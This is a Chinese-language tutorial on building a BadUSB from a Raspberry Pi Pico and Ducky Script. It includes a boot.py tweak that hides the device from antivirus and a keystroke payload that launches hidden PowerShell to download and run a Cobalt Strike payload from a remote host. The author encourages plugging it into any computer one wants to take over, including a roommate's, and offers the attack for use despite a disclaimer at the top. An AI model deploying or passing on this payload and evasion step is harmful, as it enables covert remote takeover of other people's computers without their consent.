免责声明:本文章仅供安全研究和教学目的使用,用户须自行承担因使用该技术而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,使用者应当遵循当地法律法规,并
理解并同意本声明的所有内容。
---------------------------------------------------------------------------------------------------------------------------------
Badusb制作
树莓派Pico (图片源自网络 侵删)
先说一下需要什么东西:
四芯数据线(接口与你的pico相同的)
树莓派pico
电脑
然后你会得到以下内容 
按住Pico上的BOOTSEL按钮的同时,将Pico连接至电脑,你将看到以下内容
这时将数据包内名字最长的那个adafruit-circuitpython-raspberry_pi_pico-en_US-8.0.3.uf2
托到该目录下,拖拽完成后,Pico会自动断开连接,等待几秒后重新连接,你将看到以下内容
然后再把数据包内Root文件夹里的所有文件复制进来,至此,你就完成了Badusb的制作。
不出意外的话,重新插拔一下,你就会看到HelloWorld
---------------------------------------------------------------------------------------------------------------------------------
脚本编写
自动运行的脚本是这个文件payload.dd,用记事本或者其它文本编辑器打开都可以
这里是一些基本语法,自己先看看
既然是模拟键盘操作,所以你在掌握这种脚本的同时你还需要学习其他语言,例如,CMD的脚本,PowerShell的脚本,linux的指令,Mac的指令,这是这颗科技树上其他需要点亮的技能点,但是我先不向大家介绍那些了。
第一个指令REM,REM类似于注释,后面跟随的东西不需要运行,是写给自己或者其他人看的,举个例子。
REM Hey you, hey you, Devil's little sister
REM后面是一句歌词,在运行中不会发生任何事情,但是你读代码的时候却可以看到。
由于要模拟人和键盘的交互,人不是机器,每个按键的按下和放松都有时间,每个输入之间也一样有延时,更重要的是,你进行了一些操作之后还需要等待一下,比如,按下菜单键,输入cmd,回车,之后你要等待几十到几百毫秒,才能看到cmd窗口。所以Ducky Script中有一个延时指令:DELAY。
DELAY,DEFAULT_DELAY,DEFAULTDELAY都是延时语句,后面两个一样功能,举个例子。
DEFAULT_DELAY 100
DEFAULTDELAY 100
这两个语句都是一样的,都是设置之后的语句每个语句之间间隔100ms,如果你在最开始设置了这个,之后就不用设置延时语句了。
DELAY 100
这个语句放在后面介绍的语句之间,就是代表它上下两个语句之间延时100ms。
这个语句也许是最重要的了,STRING,这个语句后面加你要输入电脑的语句,可以加任意字符,我说的字符,指的是数字,字母以及其他的比如?!-_+=\|这类。举个例子。
STRING XD
这个语句的效果就相当于你在电脑前输入了大写的XD,当然了这个语句同一行的其他字符都会被忠实的反馈到电脑上,就像你自己输入一样。
之后就是一堆特殊按键的字符,不多说,我列个表就行了。
GUI windows菜单键
WINDOWS windows菜单键
SHIFT shift键
ALT Alt键
CONTROL Ctrl键
CTRL Ctrl键
DOWNARROW 下箭头
DOWN 下箭头
LEFTARROW 左箭头
LEFT 左箭头
RIGHTARROW 右箭头
RIGHT 右箭头
UPARROW 上箭头
UP 上箭头
BREAK Pause键
PAUSE 和上一个是一样的
CAPSLOCK 大写键
DELETE 删除键
END END键,我估计你们不常用这个
ESC 键盘上左上角的键
ESCAPE 键盘上左上角的键
HOME Home键
INSERT Insert键
NUMLOCK 键盘锁键
PAGEUP 上翻页键
PAGEDOWN 下翻页键
PRINTSCREEN 屏幕截屏键
SCROLLLOCK 话说不写文档我都想不起键盘上还有这个键,Scrolllock键
SPACE 空格键,如果你延时把握的好,你甚至可以用这个指令玩炫舞
TAB 就是Tab键咯
REPEAT是一个很特殊指令,将下面的语句重复多少遍,举个例子。
REPEAT 100
STRING Hello World!
以上的代码块就是输出Hello World!这条语句一百次,无情的打字机器,对吧。 ---------------------------------------------------------------------------------------------------------------------------------
意外
大多电脑都安装了杀毒软件,无论哪款,接入了存储设备后都会弹窗,这会直接导致后面的代码无法执行,所以我们要解决掉它
修改根目录下的boot.py文件的第29行
将
noStorage = not noStorageStatus
改为
noStorage = noStorageStatus
就可以了,但是注意:此操作不可逆,一旦修改了并且重新插拔后,将无法修改运行脚本内容!
那么想要再次修改怎么办呢,一个是通过烧录座进行操作,还有一个就是再次按住Pico上的BOOTSEL按钮的同时,将Pico连接至电脑,把flash_nuke.uf2这个文件复制进去,同样,它会再次断连,几秒以后重连,就又可以用了,不过,你需要重新完成以上步骤制作Badusb
---------------------------------------------------------------------------------------------------------------------------------
配合CobaltStrike
这个工具的下载链接我就不提供了,自己想办法,它的基本使用方法可以参考这篇文章
Cobalt Strike工具安装与基础使用_cobalt strike下载-CSDN博客
我们只需要利用它制作一个简单的powershell脚本就行了
先用以下命令开启服务端
再用这些命令开启客户端
在这里选择攻击模式,选第一个
创建完成之后会得到一串命令,这就是我们的攻击命令了
很明显了,把这串代码复制到Badusb里payload.dd文件里,我这里已经写好了,根据你得到的链接,替换掉倒数第二行STRING后的所有字符
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 500
STRING powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.155:80/aa'))"
ENTER然后保存,这时候你就可以把这个Badusb插到任何一台你想拿下的设备上了,比如室友的电脑,插上去之后会有5秒左右的前台操作,随后便会隐藏到后台,这时CS这边已经上线了,然后你就可以恶搞你的室友了。然鹅在实际操作中,有可能会遇到杀毒软件的阻拦,不过根据测试,修改掉之前boot.py那一行代码后,插电脑上杀毒软件是读取不到的,也算是一种免杀了吧?
---------------------------------------------------------------------------------------------------------------------------------
Pico外壳
就一块裸电路板,怎么能够满足随身携带的要求,电子元件裸露一方面容易氧化,还容易进水,有3d打印机的还可以直接打印一个外壳,然后对于我们这种贫民窟的,我也推荐一款外壳
就是这种某多多上两三块的wifi信号增强器,毫无疑问肯定是假的,但是这个外壳用来装pico真的刚刚好,特别完美,强烈推荐
好了,以上就是这篇文章的全部内容,希望对你有帮助,拜~